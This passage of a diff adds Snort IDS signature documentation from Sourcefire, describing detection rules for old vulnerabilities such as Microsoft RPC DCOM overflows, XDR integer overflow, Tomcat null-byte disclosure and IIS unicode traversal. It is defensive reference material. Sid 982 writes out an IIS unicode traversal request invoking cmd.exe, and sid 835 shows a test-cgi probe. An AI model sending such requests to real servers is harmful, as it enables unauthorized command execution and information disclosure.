+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3341.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3341
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3326.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3326
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2415.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2415
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the handling of ISAKMP data and SA keys.
+
+--
+Impact:
+Serious
+
+--
+Detailed Information:
+The Internet Security Association and Key Management Protocol (ISAKMP) 
+is used as a framework for an authentication method between peers using 
+secure keys.
+
+ISAKMP is a framework for authentication using cryptographic keys. It 
+specifically defines the process of key exchange as opposed to the 
+generation of a cryptographic key.
+
+ISAKMP also details the procedures for the required security 
+associations in network security services.
+
+--
+Affected Systems:
+	Kame Racoon
+
+--
+Attack Scenarios:
+The attacker may attempt to delete keys and security associations in
+hosts running the KAME IKE Daemon.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ISAKMP:
+http://www.networksorcery.com/enp/protocol/isakmp.htm
+
+RFC:
+http://www.ietf.org/rfc/rfc2407.txt
+http://www.ietf.org/rfc/rfc2408.txt
+
+IANA:
+http://www.iana.org/assignments/isakmp-registry
+
+--
--- /dev/null
+++ b/doc/signatures/837.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+837
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3288.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3288
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2094.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2094
+
+--
+Summary:
+vulnerability in the rpc service for the Calendar Manager Service Daemon
+(CMSD) used by XDR.
+
+--
+Impact:
+System compromise, denial of service, execution of arbitrary code, 
+information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in various implementations of external data 
+representation (XDR) libraries. An integer overflow in a component 
+(xdr_array) used by XDR can lead to a buffer overflow.
+
+The XDR libraries are widely used by multiple vendors to provide a 
+framework for data transmission across networks. This is most commonly 
+used in RPC implementations.
+
+A specially crafted rpc request containing a large number of arguments 
+to xdr_array can lead to remote system compromise and super user access 
+to the target host. Additionally, a denial of service and execution of 
+arbitrary code with the privilege of the super user is also possible 
+depending on the platform used.
+
+--
+Affected Systems:
+Multiple verndors including all those using:
+	Sun Microsystems Network Services Library (libnsl)
+	GNU C library with sunrpc (glibc)
+	BSD-derived libraries with XDR/RPC routines (libc)
+
+--
+Attack Scenarios:
+The attacker needs to send a specially crafted rpc request containing a 
+large number of arguments for xdr_array to the target host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade the vendor libraries to the latest non-affected versions. Any 
+statically linked binaries and applications must be recompiled and 
+restarted after the upgrade.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5356
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0391
+
+CERT:
+http://www.cert.org/advisories/CA-2002-25.html
+http://www.kb.cert.org/vuls/id/192995
+
+--
--- /dev/null
+++ b/doc/signatures/430.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+430
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Type 40 Code 1 Authentication Failed datagram.
+
+--
+
+Impact:
+ICMP Type 40 Code 1 datagrams are an indication that a received datagram failed the authenticity or integrity check for a given SPI.  Normally this is an indication that hosts using IP Security Protocols such as AH or ESP have been configured incorrectly or are failing to establish a session with another host.
+
+--
+
+Detailed Information:
+Hosts using IP Security Protocols such as AH or ESP generate ICMP Type 40 datagrams when a failure condition occurs.  ICMP Type 40 Code 1 datagrams are generated when a received datagram failed the authenticity or integrity check for a given SPI (Security Parameters Index).  In some situations this may be an indication that an outer Encapsulation Security Protocol is in use, and the Authentication Header SPI is hidden inside the encapsulation.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 40 datagrams not normally seen on the network.  Currently Sourcefire is unaware of any hardware that has implemented these types of ICMP datagrams.  Hosts generating these types of ICMP datagrams should be investigated for nefarious activity or configuration errors. 
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC2521
+
+
+--
--- /dev/null
+++ b/doc/signatures/210.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+210
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a Telnet server using the phrase "backdoor".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3427.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3427
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2863.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2863
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_nvarchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1777.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+1777
+--
+Summary:
+This rule detects an attacker executing the STAT command along with file globbing character '*'. This affects Cisco equipment and Microsoft's IIS 4.0, 5.0, and 5.1. 
+
+--
+Impact:
+Severe; this vulnerablity is remotely exploitable, and is present on systems that are widely deployed.
+--
+Detailed Information:
+This rule detects an attacker executing the STAT command along with file globbing character '*'.  There is a vulnerability in Microsofts IIS 4.0, 5.0, and 5.1 servers,  that causes the service to crash once it receives the STAT command along with a large number of file globbing characters.  
+
+VisNetic and Titan FTP servers are also vulnerable to an attack which can present the attacker with the opportunity to break out of the ftp root directory using this command.
+
+--
+Affected Systems:
+Microsoft Internet Information Server 4, 5 and 5.1
+Some versions of Cisco equipment
+VisNetic FTP Server
+Titan FTP Server
+
+--
+Attack Scenarios:
+An attacker logs into a vulnerable hosts and executes the STAT command with multiple file globbing characters.  This would cause the service to crash.
+
+The attacker may also use Nessus to scan for a vulnerable server.
+
+--
+Ease of Attack:
+The attack can be executed with relative ease.
+--
+False Positives:
+None known to date
+--
+False Negatives:
+None known to date.
+--
+Corrective Action:
+Microsoft has released a IIS Security Roll-up Package that addresses this issue.  The Roll-up package can be found at: 
+http://www.microsoft.com/ntserver/nts/downloads/security/q319733/default.asp 
+More information on this package can be found at: 
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-018.asp
+--
+Contributors:
+Sourcefire Research Team
+mike.poor@sourcefire.com
+-- 
+Additional References:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-018.asp
+http://www.microsoft.com/ntserver/nts/downloads/security/q319733/default.asp
+
+
+--
--- /dev/null
+++ b/doc/signatures/2017.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2017
+
+--
+Summary:
+Embedded Support Partner (ESP) is an integral part of the SGI IRIX 
+operating system to enable remote support for the operating system
+
+A vulnerability exists in the Embedded Support Partner Daemon (ESP) that
+could lead to arbitrary commands being executed on a target host.
+
+--
+Impact:
+Remote super user access leading to a compromise of the target machine 
+along with any network resources that machine is connected to.
+
+--
+Detailed Information:
+The ESP daemon is an RPC (Remote Procedure Call) resource used on SGI 
+IRIX systems. The ESP daemon runs with the privileges of the root user. 
+IRIX version 6.5.8 and prior are susceptible to a buffer overflow of the
+ESP daemon leading to a remote root compromise of the affected host.
+
+--
+Affected Systems:
+SGI IRIX 6.5.8 and earlier.
+
+--
+Attack Scenarios:
+The attacker would need to craft a packet that would lead to the buffer
+overflow. No current exploits are available.
+
+--
+Ease of Attack:
+Difficult
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+All systems running vulnerable versions of rpc.espd should have the appropriate patch applied. 
+
+Additionally, the ESP daemon should be disabled where not needed by 
+commenting out the appropriate line in inetd.conf. The daemon itself can
+be made non-executable by removal of the x bit (chmod -x rpc.espd).
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0331
+
+Bugtraq:
+http://www.securityfocus.com/bid/2714
+
+--
--- /dev/null
+++ b/doc/signatures/835.txt
@@ -0,0 +1,66 @@
+Rule:
+--
+Sid:
+835
+
+--
+Summary:
+This event is generated when an attempt is made to 
+access to the cgi script test-cgi.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+The test-cgi script is provided as part of the Apache web server to
+test that cgi scripts are working.  It can provide vital information
+about the configuration of your webserver that may be invaluable to a
+potential attacker.
+
+--
+Affected Systems:
+	All versions of Apache.
+ 
+--
+Attack Scenarios:
+A standard web request using a browser.
+
+lynx http://victim/cgi-bin/test-cgi
+
+$ telnet victim 80
+Trying 192.168.0.2...
+Connected to victim.
+Escape character is '^]'.
+GET /cgi-bin/test-cgi HTTP/1.0
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+This may trigger on urls containing test-cgi, but are not necessarily
+indicative of an attack.  For example,
+http://myhost.org/home/foobar/test-cgi.txt would trigger this rule.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine the need for this script, and remove it if there is no need.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3247.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3247
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/982.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+982
+
+--
+Summary:
+This event is generated when an attempt is made use a unicode encoded representaion of a "\" in a URL request.  This may permit an attacker to navigate to files and directories outside the web root of a vulnerable Internet Information Services (IIS) server. 
+
+--
+Impact:
+Remote access.  This attack can allow an attacker to execute commands a vulnerable IIS server. 
+
+--
+Detailed Information:
+User access should be restricted to an assigned web root directory and subdirectories when interacting with a web server.  Attackers who attempt to perform directory traversals outside the web root should be denied access.  A vulnerability exists in IIS web servers that allows directory traversal outside the web root directory when unicode encoding of specific characters is used.  This particular attack uses the unicode encoding of the "\" to escape the web root.  This may permit an attacker to execute commands on the vulnerable server. 
+
+--
+Affected Systems:
+IIS 4.0, 5.0 servers
+
+--
+Attack Scenarios:
+An attacker can unicode encode a directory traversal character permitting execution of commands on the IIS server. 
+
+--
+Ease of Attack:
+Simple. 
+GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link. 
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0084
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
+
+--
--- /dev/null
+++ b/doc/signatures/100000832.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000832
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "markas" parameter in the "read.markas.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2001.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2001
+
+--
+Summary:
+This event is generated when a remote user attempts to access smartsearch.cgi on a web server. This may indicate an attempt to exploit an arbitrary code execution vulnerability in Smart Search, a "pay-per-click" search engine.
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+Smart Search "pay-per-click" search engine software contains a vulnerability that allows code execution using a specially-crafted URL. Using the "keywords" parameter accepted by smartsearch.cgi, an attacker can pass arbitrary Perl code to the web server, which will then attempt to execute it.
+
+--
+Affected Systems:
+Any server using Smart Search 4.x.
+
+--
+Attack Scenarios:
+An attacker can pass Perl code to a web server running Smart Search by forwarding a URL with specific keyword parameters. The web server will then attempt to execute the commands included in the URL.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+If a legitimate remote user accesses smartsearch.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched in recent versions. Contact the vendor (http://www.smarterscripts.com/smartsearch/index.shtml) for more details. 
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+SecuriTeam
+http://www.securiteam.com/exploits/5AP041F8VA.html
+
+Secunia
+http://www.secunia.com/advisories/8389/
+
+--
--- /dev/null
+++ b/doc/signatures/1320.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1320
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "fuck movies".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "fuck movies".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.  This rule could also be triggered by visiting the website of somebody who really really doesn't like movies.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2061.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2061
+
+--
+Summary:
+Jakarta Tomcat webserver.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+A vulnerability exists in Jakarta Tomcat webservers prior to version 
+3.3.1a such that a request containing a null byte will result in a 
+directory listing or present the opportunity to view the source of a 
+java servlet on the server.
+
+This occurs wether or not an index file is present in the directory.
+
+--
+Affected Systems:
+Jakarta Tomcat web application server prior to version 3.3.1a
+
+--
+Attack Scenarios:
+The attacker needs to supply a null byte in a URI request to the server.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade the server to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0042
+
+Apache Jakarta Tomcat:
+http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/
+
+--
--- /dev/null
+++ b/doc/signatures/3216.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3216
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3384.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3384
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
